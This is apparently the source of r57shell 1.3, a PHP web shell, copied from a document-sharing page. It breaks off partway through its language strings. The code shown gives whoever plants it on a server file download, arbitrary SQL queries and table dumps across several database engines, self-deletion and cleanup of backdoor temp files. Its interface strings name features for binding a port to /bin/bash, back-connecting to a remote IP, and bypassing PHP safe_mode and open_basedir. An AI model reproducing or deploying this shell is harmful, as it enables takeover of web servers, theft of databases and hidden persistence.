Anda di halaman 1dari 45

<?

php
/*******************************************************************************
***********************/
/*
/* # # # #
/* # # # #
/* # # # #
/* # ## #### ## #
/* ## ## ###### ## ##
/* ## ## ###### ## ##
/* ## ## #### ## ##
/* ### ############ ###
/* ########################
/* ##############
/* ######## ########## #######
/* ### ## ########## ## ###
/* ### ## ########## ## ###
/* ### # ########## # ###
/* ### ## ######## ## ###
/* ## # ###### # ##
/* ## # #### # ##
/* ## ##
/* r57shell.php - ñêðèïò íà ïõï ïîçâîëÿþùèé âàì âûïîëíÿòü ñèñòåìíûå êîìàíäû íà ñåðâåðå ÷åð
/* Âû ìîæåòå ñêà÷àòü íîâóþ âåðñèþ íà íàøåì ñàéòå: http://c99shell.com
/* Âåðñèÿ: 1.3 (05.03.2006)
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~*/
/* Îòäåëüíàÿ áëàãîäàðíîñòü çà ïîìîùü è èäåè: blf, phoenix, virus, NorD è âñåì ÷åðòÿì èç RS
/* Åñëè ó Âàñ åñòü êàêèå-ëèáî èäåè ïî ïîâîäó òîãî êàêèå ôóíêöèè ñëåäóåò äîáàâèòü â ñêðèïò
/* íà rst@void.ru. Âñå ïðåäëîæåíèÿ áóäóò ðàññìîòðåíû.
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~*/
/* (c)oded by 1dt.w0lf
/* RST/GHC http://c99shell.com , http://ghc.ru
/* ANY MODIFIED REPUBLISHING IS RESTRICTED
/*******************************************************************************
***********************/
/* ~~~ Íàñòðîéêè | Options ~~~ */
// Âûáîð ÿçûêà | Language
// $language='ru' - ðóññêèé (russian)
// $language='eng' - english (àíãëèéñêèé)
$language='eng';
// Àóòåíòèôèêàöèÿ | Authentification
// $auth = 1; - Àóòåíòèôèêàöèÿ âêëþ÷åíà ( authentification = On )
// $auth = 0; - Àóòåíòèôèêàöèÿ âûêëþ÷åíà ( authentification = Off )
$auth = 0;
// Ëîãèí è ïàðîëü äëÿ äîñòóïà ê ñêðèïòó (Login & Password for access)
// ÍÅ ÇÀÁÓÄÜÒÅ ÑÌÅÍÈÒÜ ÏÅÐÅÄ ÐÀÇÌÅÙÅÍÈÅÌ ÍÀ ÑÅÐÂÅÐÅ!!! (CHANGE THIS!!!)
// Ëîãèí è ïàðîëü øèôðóþòñÿ ñ ïîìîùüþ àëãîðèòìà md5, çíà÷åíèÿ ïî óìîë÷àíèþ 'r57'
// Login & password crypted with md5, default is 'r57'
$name='ec371748dc2da624b35a4f8f685dd122'; // ëîãèí ïîëüçîâàòåëÿ (user login)
$pass='ec371748dc2da624b35a4f8f685dd122'; // ïàðîëü ïîëüçîâàòåëÿ (user password)
/*******************************************************************************
***********************/
error_reporting(0);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
$version = "1.3";
if(version_compare(phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
}
if (@get_magic_quotes_gpc())
{
foreach ($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
foreach ($_SERVER as $k=>$v)
{
$_SERVER[$k] = stripslashes($v);
}
}
if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name
|| md5($_SERVER['PHP_AUTH_PW'])!==$pass)
{
header('WWW-Authenticate: Basic realm="r57shell"');
header('HTTP/1.0 401 Unauthorized');
exit("<b><a href=http://c99shell.com>r57shell</a> : Access Denied</b>");
}
}
$head = '<!-- Çäðàâñòâóé Âàñÿ -->
<html>
<head>
<title>r57shell</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<STYLE>
tr {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #E8481C 1px solid;
BORDER-LEFT: #E8481C 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
}
td {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #E8481C 1px solid;
BORDER-LEFT: #E8481C 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
}
.table1 {
BORDER-RIGHT: #3A6EA5 0px;
BORDER-TOP: #3A6EA5 0px;
BORDER-LEFT: #3A6EA5 0px;
BORDER-BOTTOM: #3A6EA5 0px;
BACKGROUND-COLOR: #81D1EE;
}
.td1 {
BORDER-RIGHT: #3A6EA5 0px;
BORDER-TOP: #3A6EA5 0px;
BORDER-LEFT: #3A6EA5 0px;
BORDER-BOTTOM: #3A6EA5 0px;
font: 7pt Verdana;
}
.tr1 {
BORDER-RIGHT: #3A6EA5 0px;
BORDER-TOP: #3A6EA5 0px;
BORDER-LEFT: #3A6EA5 0px;
BORDER-BOTTOM: #3A6EA5 0px;
}
table {
BORDER-RIGHT: #E8481C 1px outset;
BORDER-TOP: #E8481C 1px outset;
BORDER-LEFT: #E8481C 1px outset;
BORDER-BOTTOM: #E8481C 1px outset;
BACKGROUND-COLOR: #81D1EE;
}
input {
BORDER-RIGHT: #000000 1px solid;
BORDER-TOP: #FC602B 1px solid;
BORDER-LEFT: #FC602B 1px solid;
BORDER-BOTTOM: #000000 1px solid;
BACKGROUND-COLOR: #FFFFFF;
font: 8pt Verdana;
}
select {
BORDER-RIGHT: #000000 1px solid;
BORDER-TOP: #FC602B 1px solid;
BORDER-LEFT: #FC602B 1px solid;
BORDER-BOTTOM: #000000 1px solid;
BACKGROUND-COLOR: #FFFFFF;
font: 8pt Verdana;
}
submit {
BORDER-RIGHT: buttonhighlight 2px outset;
BORDER-TOP: buttonhighlight 2px outset;
BORDER-LEFT: buttonhighlight 2px outset;
BORDER-BOTTOM: buttonhighlight 2px outset;
BACKGROUND-COLOR: #FFFFFF;
width: 30%;
}
textarea {
BORDER-RIGHT: #000000 1px solid;
BORDER-TOP: #FC602B 1px solid;
BORDER-LEFT: #FC602B 1px solid;
BORDER-BOTTOM: #000000 1px solid;
BACKGROUND-COLOR: #FFFFFF;
font: Fixedsys bold;
}
BODY {
margin-top: 1px;
margin-right: 1px;
margin-bottom: 1px;
margin-left: 1px;
}
A:link {COLOR:white; TEXT-DECORATION: none}
A:visited { COLOR:white; TEXT-DECORATION: none}
A:active {COLOR:white; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}
</STYLE>';
class zipfile
{
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) |
($timearray['mday'] << 16) |
($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($t
imearray['seconds'] >> 1);
}
function addFile($data, $name, $time = 0)
{
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->unix2DosTime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$this -> datasec[] = $fr;
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this -> old_offset );
$this -> old_offset += strlen($fr);
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function file()
{
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
return
$data .
$ctrldir .
$this -> eof_ctrl_dir .
pack('v', sizeof($this -> ctrl_dir)) .
pack('v', sizeof($this -> ctrl_dir)) .
pack('V', strlen($ctrldir)) .
pack('V', strlen($data)) .
"\x00\x00";
}
}
function compress(&$filename,&$filedump,$compress)
{
global $content_encoding;
global $mime_type;
if ($compress == 'bzip' && @function_exists('bzcompress'))
{
$filename .= '.bz2';
$mime_type = 'application/x-bzip2';
$filedump = bzcompress($filedump);
}
else if ($compress == 'gzip' && @function_exists('gzencode'))
{
$filename .= '.gz';
$content_encoding = 'x-gzip';
$mime_type = 'application/x-gzip';
$filedump = gzencode($filedump);
}
else if ($compress == 'zip' && @function_exists('gzcompress'))
{
$filename .= '.zip';
$mime_type = 'application/zip';
$zipfile = new zipfile();
$zipfile -> addFile($filedump, substr($filename, 0, -4));
$filedump = $zipfile -> file();
}
else
{
$mime_type = 'application/octet-stream';
}
}
function mailattach($to,$from,$subj,$attach)
{
$headers = "From: $from\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: ".$attach['type'];
$headers .= "; name=\"".$attach['name']."\"\r\n";
$headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
$headers .= chunk_split(base64_encode($attach['content']))."\r\n";
if(@mail($to,$subj,"",$headers)) { return 1; }
return 0;
}
class my_sql
{
var $host = 'localhost';
var $port = '';
var $user = '';
var $pass = '';
var $base = '';
var $db = '';
var $connection;
var $res;
var $error;
var $rows;
var $columns;
var $num_rows;
var $num_fields;
var $dump;
function connect()
{
switch($this->db)
{
case 'MySQL':
if(empty($this->port)) { $this->port = '3306'; }
if(!function_exists('mysql_connect')) return 0;
$this->connection = @mysql_connect($this->host.':'.$this->port,$this->
user,$this->pass);
if(is_resource($this->connection)) return 1;
break;
case 'MSSQL':
if(empty($this->port)) { $this->port = '1433'; }
if(!function_exists('mssql_connect')) return 0;
$this->connection = @mssql_connect($this->host.','.$this->port,$this->
user,$this->pass);
if($this->connection) return 1;
break;
case 'PostgreSQL':
if(empty($this->port)) { $this->port = '5432'; }
$str = "host='".$this->host."' port='".$this->port."' user='".$this->user.
"' password='".$this->pass."' dbname='".$this->base."'";
if(!function_exists('pg_connect')) return 0;
$this->connection = @pg_connect($str);
if(is_resource($this->connection)) return 1;
break;
case 'Oracle':
if(!function_exists('ocilogon')) return 0;
$this->connection = @ocilogon($this->user, $this->pass, $this->base);
if(is_resource($this->connection)) return 1;
break;
}
return 0;
}
function select_db()
{
switch($this->db)
{
case 'MySQL':
if(@mysql_select_db($this->base,$this->connection)) return 1;
break;
case 'MSSQL':
if(@mssql_select_db($this->base,$this->connection)) return 1;
break;
case 'PostgreSQL':
return 1;
break;
case 'Oracle':
return 1;
break;
}
return 0;
}
function query($query)
{
$this->res=$this->error='';
switch($this->db)
{
case 'MySQL':
if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connecti
on)))
{
$this->error = @mysql_error($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
case 'MSSQL':
if(false===($this->res=@mssql_query($query,$this->connection)))
{
$this->error = 'Query error';
return 0;
}
else if(@mssql_num_rows($this->res) > 0) { return 1; }
return 2;
break;
case 'PostgreSQL':
if(false===($this->res=@pg_query($this->connection,$query)))
{
$this->error = @pg_last_error($this->connection);
return 0;
}
else if(@pg_num_rows($this->res) > 0) { return 1; }
return 2;
break;
case 'Oracle':
if(false===($this->res=@ociparse($this->connection,$query)))
{
$this->error = 'Query parse error';
}
else
{
if(@ociexecute($this->res))
{
if(@ocirowcount($this->res) != 0) return 2;
return 1;
}
$error = @ocierror();
$this->error=$error['message'];
}
break;
}
return 0;
}
function get_result()
{
$this->rows=array();
$this->columns=array();
$this->num_rows=$this->num_fields=0;
switch($this->db)
{
case 'MySQL':
$this->num_rows=@mysql_num_rows($this->res);
$this->num_fields=@mysql_num_fields($this->res);
while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
@mysql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); retur
n 1;}
break;
case 'MSSQL':
$this->num_rows=@mssql_num_rows($this->res);
$this->num_fields=@mssql_num_fields($this->res);
while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
@mssql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); retur
n 1;};
break;
case 'PostgreSQL':
$this->num_rows=@pg_num_rows($this->res);
$this->num_fields=@pg_num_fields($this->res);
while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
@pg_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); retur
n 1;}
break;
case 'Oracle':
$this->num_fields=@ocinumcols($this->res);
while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_
rows++;
@ocifreestatement($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;
}
break;
}
return 0;
}
function dump($table)
{
if(empty($table)) return 0;
$this->dump=array();
$this->dump[0] = '##';
$this->dump[1] = '## --------------------------------------- ';
$this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
$this->dump[3] = '## Database: '.$this->base;
$this->dump[4] = '## Table: '.$table;
$this->dump[5] = '## --------------------------------------- ';
switch($this->db)
{
case 'MySQL':
$this->dump[0] = '## MySQL dump';
if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) re
turn 0;
if(!$this->get_result()) return 0;
$this->dump[] = $this->rows[0]['Create Table'];
$this->dump[] = '## --------------------------------------- ';
if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return
0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_esca
pe_string($v);}
$this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->
columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'MSSQL':
$this->dump[0] = '## MSSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);
}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->colum
ns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'PostgreSQL':
$this->dump[0] = '## PostgreSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);
}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->colum
ns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'Oracle':
$this->dump[0] = '## ORACLE dump';
$this->dump[] = '## under construction';
break;
default:
return 0;
break;
}
return 1;
}
function close()
{
switch($this->db)
{
case 'MySQL':
@mysql_close($this->connection);
break;
case 'MSSQL':
@mssql_close($this->connection);
break;
case 'PostgreSQL':
@pg_close($this->connection);
break;
case 'Oracle':
@oci_close($this->connection);
break;
}
}
function affected_rows()
{
switch($this->db)
{
case 'MySQL':
return @mysql_affected_rows($this->res);
break;
case 'MSSQL':
return @mssql_affected_rows($this->res);
break;
case 'PostgreSQL':
return @pg_affected_rows($this->res);
break;
case 'Oracle':
return @ocirowcount($this->res);
break;
default:
return 0;
break;
}
}
}
if(isset($_GET['img'])&&!empty($_GET['img']))
{
$images = array();
$images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQI
AOw==';
$images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgI
AOw==';
@ob_clean();
header("Content-type: image/gif");
echo base64_decode($images[$_GET['img']]);
die();
}
if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_fil
e" && !empty($_POST['d_name']))
{
if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['c
md']=""; }
else
{
@ob_clean();
$filename = @basename($_POST['d_name']);
$filedump = @fread($file,@filesize($_POST['d_name']));
fclose($file);
$content_encoding=$mime_type='';
compress($filename,$filedump,$_POST['compress']);
if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_enco
ding); }
header("Content-type: ".$mime_type);
header("Content-disposition: attachment; filename=\"".$filename."\";");
echo $filedump;
exit();
}
}
if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font
face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font
></div>"; die(); }
if ($_POST['cmd']=="db_query")
{
echo $head;
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
$querys = @explode(';',$_POST['db_query']);
if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=o
range><b>Can't connect to SQL server</b></font></div>";
else
{
if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face
=Verdana size=-2 color=orange><b>Can't select database</b></font></div>";
else
{
foreach($querys as $num=>$query)
{
if(strlen($query)>5)
{
echo "<font face=Verdana size=-2 color=white><b>Query#".$num." : ".htmlspe
cialchars($query,ENT_QUOTES)."</b></font><br>";
switch($sql->query($query))
{
case '0':
echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$
sql->error."</b></font></td></tr></table>";
break;
case '1':
if($sql->get_result())
{
echo "<table width=100%>";
foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v
,ENT_QUOTES);
$keys = @implode("&nbsp;</b></font></td><td bgcolor=#3A6EA5><font face=V
erdana size=-2><b>&nbsp;", $sql->columns);
echo "<tr><td bgcolor=#3A6EA5><font face=Verdana size=-2><b>&nbsp;".$key
s."&nbsp;</b></font></td></tr>";
for($i=0;$i<$sql->num_rows;$i++)
{
foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars
($v,ENT_QUOTES);
$values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&n
bsp;",$sql->rows[$i]);
echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font>
</td></tr>';
}
echo "</table>";
}
break;
case '2':
$ar = $sql->affected_rows()?($sql->affected_rows()):('0');
echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows
: <b>".$ar."</b></font></td></tr></table><br>";
break;
}
}
}
}
}
echo "<br><form name=form method=POST>";
echo in('hidden','db',0,$_POST['db']);
echo in('hidden','db_server',0,$_POST['db_server']);
echo in('hidden','db_port',0,$_POST['db_port']);
echo in('hidden','mysql_l',0,$_POST['mysql_l']);
echo in('hidden','mysql_p',0,$_POST['mysql_p']);
echo in('hidden','mysql_db',0,$_POST['mysql_db']);
echo in('hidden','cmd',0,'db_query');
echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POS
T['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."<
/textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br
><br>";
echo "</form>";
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[
'PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
}
if(isset($_GET['delete']))
{
@unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
}
if(isset($_GET['tmp']))
{
@unlink("/tmp/bdpl");
@unlink("/tmp/back");
@unlink("/tmp/bd");
@unlink("/tmp/bd.c");
@unlink("/tmp/dp");
@unlink("/tmp/dpc");
@unlink("/tmp/dpc.c");
}
if(isset($_GET['phpini']))
{
echo $head;
function U_value($value)
{
if ($value == '') return '<i>no value</i>';
if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
if ($value === null) return 'NULL';
if (@is_object($value)) $value = (array) $value;
if (@is_array($value))
{
@ob_start();
print_r($value);
$value = @ob_get_contents();
@ob_end_clean();
}
return U_wordwrap((string) $value);
}
function U_wordwrap($str)
{
$str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
}
if (@function_exists('ini_get_all'))
{
$r = '';
echo '<table width=100%>', '<tr><td bgcolor=#3A6EA5><font face=Verdana size=-2
color=orange><div align=center><b>Directive</b></div></font></td><td bgcolor=#3A
6EA5><font face=Verdana size=-2 color=orange><div align=center><b>Local Value</b
></div></font></td><td bgcolor=#3A6EA5><font face=Verdana size=-2 color=orange><
div align=center><b>Master Value</b></div></font></td></tr>';
foreach (@ini_get_all() as $key=>$value)
{
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td>
<td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_valu
e']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>
'.U_value($value['global_value']).'</b></div></font></td></tr>';
}
echo $r;
echo '</table>';
}
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['
PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
if(isset($_GET['cpu']))
{
echo $head;
echo '<table width=100%><tr><td bgcolor=#3A6EA5><div align=center><font face=
Verdana size=-2 color=orange><b>CPU</b></font></div></td></tr></table><table wid
th=100%>';
$cpuf = @file("cpuinfo");
if($cpuf)
{
$c = @sizeof($cpuf);
for($i=0;$i<$c;$i++)
{
$info = @explode(":",$cpuf[$i]);
if($info[1]==""){ $info[1]="---"; }
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0])
.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($in
fo[1]).'</b></div></font></td></tr>';
}
echo $r;
}
else
{
echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --
- </b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVE
R['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
if(isset($_GET['mem']))
{
echo $head;
echo '<table width=100%><tr><td bgcolor=#3A6EA5><div align=center><font face=
Verdana size=-2 color=orange><b>MEMORY</b></font></div></td></tr></table><table
width=100%>';
$memf = @file("meminfo");
if($memf)
{
$c = sizeof($memf);
for($i=0;$i<$c;$i++)
{
$info = explode(":",$memf[$i]);
if($info[1]==""){ $info[1]="---"; }
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0])
.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($in
fo[1]).'</b></div></font></td></tr>';
}
echo $r;
}
else
{
echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --
- </b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVE
R['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
$lang=array(
'ru_text1' =>'Âûïîëíåííàÿ êîìàíäà',
'ru_text2' =>'Âûïîëíåíèå êîìàíä íà ñåðâåðå',
'ru_text3' =>'Âûïîëíèòü êîìàíäó',
'ru_text4' =>'Ðàáî÷àÿ äèðåêòîðèÿ',
'ru_text5' =>'Çàãðóçêà ôàéëîâ íà ñåðâåð',
'ru_text6' =>'Ëîêàëüíûé ôàéë',
'ru_text7' =>'Àëèàñû',
'ru_text8' =>'Âûáåðèòå àëèàñ',
'ru_butt1' =>'Âûïîëíèòü',
'ru_butt2' =>'Çàãðóçèòü',
'ru_text9' =>'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash',
'ru_text10'=>'Îòêðûòü ïîðò',
'ru_text11'=>'Ïàðîëü äëÿ äîñòóïà',
'ru_butt3' =>'Îòêðûòü',
'ru_text12'=>'back-connect',
'ru_text13'=>'IP-àäðåñ',
'ru_text14'=>'Ïîðò',
'ru_butt4' =>'Âûïîëíèòü',
'ru_text15'=>'Çàãðóçêà ôàéëîâ ñ óäàëåííîãî ñåðâåðà',
'ru_text16'=>'Èñïîëüçîâàòü',
'ru_text17'=>'Óäàëåííûé ôàéë',
'ru_text18'=>'Ëîêàëüíûé ôàéë',
'ru_text19'=>'Exploits',
'ru_text20'=>'Èñïîëüçîâàòü',
'ru_text21'=>'Íîâîå èìÿ',
'ru_text22'=>'datapipe',
'ru_text23'=>'Ëîêàëüíûé ïîðò',
'ru_text24'=>'Óäàëåííûé õîñò',
'ru_text25'=>'Óäàëåííûé ïîðò',
'ru_text26'=>'Èñïîëüçîâàòü',
'ru_butt5' =>'Çàïóñòèòü',
'ru_text28'=>'Ðàáîòà â safe_mode',
'ru_text29'=>'Äîñòóï çàïðåùåí',
'ru_butt6' =>'Ñìåíèòü',
'ru_text30'=>'Ïðîñìîòð ôàéëà',
'ru_butt7' =>'Âûâåñòè',
'ru_text31'=>'Ôàéë íå íàéäåí',
'ru_text32'=>'Âûïîëíåíèå PHP êîäà',
'ru_text33'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé open_basedir ÷åðåç ôóíêöèè cURL',
'ru_butt8' =>'Ïðîâåðèòü',
'ru_text34'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç ôóíêöèþ include',
'ru_text35'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç çàãðóçêó ôàéëà â mysq
'ru_text36'=>'Áàçà . Òàáëèöà',
'ru_text37'=>'Ëîãèí',
'ru_text38'=>'Ïàðîëü',
'ru_text39'=>'Áàçà',
'ru_text40'=>'Äàìï òàáëèöû áàçû äàííûõ',
'ru_butt9' =>'Äàìï',
'ru_text41'=>'Ñîõðàíèòü â ôàéëå',
'ru_text42'=>'Ðåäàêòèðîâàíèå ôàéëà',
'ru_text43'=>'Ðåäàêòèðîâàòü ôàéë',
'ru_butt10'=>'Ñîõðàíèòü',
'ru_butt11'=>'Ðåäàêòèðîâàòü',
'ru_text44'=>'Ðåäàêòèðîâàíèå ôàéëà íåâîçìîæíî! Äîñòóï òîëüêî äëÿ ÷òåíèÿ!',
'ru_text45'=>'Ôàéë ñîõðàíåí',
'ru_text46'=>'Ïðîñìîòð phpinfo()',
'ru_text47'=>'Ïðîñìîòð íàñòðîåê php.ini',
'ru_text48'=>'Óäàëåíèå âðåìåííûõ ôàéëîâ',
'ru_text49'=>'Óäàëåíèå ñêðèïòà ñ ñåðâåðà',
'ru_text50'=>'Èíôîðìàöèÿ î ïðîöåññîðå',
'ru_text51'=>'Èíôîðìàöèÿ î ïàìÿòè',
'ru_text52'=>'Òåêñò äëÿ ïîèñêà',
'ru_text53'=>'Èñêàòü â ïàïêå',
'ru_text54'=>'Ïîèñê òåêñòà â ôàéëàõ',
'ru_butt12'=>'Íàéòè',
'ru_text55'=>'Òîëüêî â ôàéëàõ',
'ru_text56'=>'Íè÷åãî íå íàéäåíî',
'ru_text57'=>'Ñîçäàòü/Óäàëèòü Ôàéë/Äèðåêòîðèþ',
'ru_text58'=>'Èìÿ',
'ru_text59'=>'Ôàéë',
'ru_text60'=>'Äèðåêòîðèþ',
'ru_butt13'=>'Ñîçäàòü/Óäàëèòü',
'ru_text61'=>'Ôàéë ñîçäàí',
'ru_text62'=>'Äèðåêòîðèÿ ñîçäàíà',
'ru_text63'=>'Ôàéë óäàëåí',
'ru_text64'=>'Äèðåêòîðèÿ óäàëåíà',
'ru_text65'=>'Ñîçäàòü',
'ru_text66'=>'Óäàëèòü',
'ru_text67'=>'Chown/Chgrp/Chmod',
'ru_text68'=>'Êîìàíäà',
'ru_text69'=>'Ïàðàìåòð1',
'ru_text70'=>'Ïàðàìåòð2',
'ru_text71'=>"Âòîðîé ïàðàìåòð êîìàíäû:\r\n- äëÿ CHOWN - èìÿ íîâîãî ïîëüçîâàòåëÿ èëè åãî UID
'ru_text72'=>'Òåêñò äëÿ ïîèñêà',
'ru_text73'=>'Èñêàòü â ïàïêå',
'ru_text74'=>'Èñêàòü â ôàéëàõ',
'ru_text75'=>'* ìîæíî èñïîëüçîâàòü ðåãóëÿðíîå âûðàæåíèå',
'ru_text76'=>'Ïîèñê òåêñòà â ôàéëàõ ñ ïîìîùüþ óòèëèòû find',
'ru_text80'=>'Òèï',
'ru_text81'=>'Ñåòü',
'ru_text82'=>'Áàçû äàííûõ',
'ru_text83'=>'Âûïîëíåíèå SQL çàïðîñà',
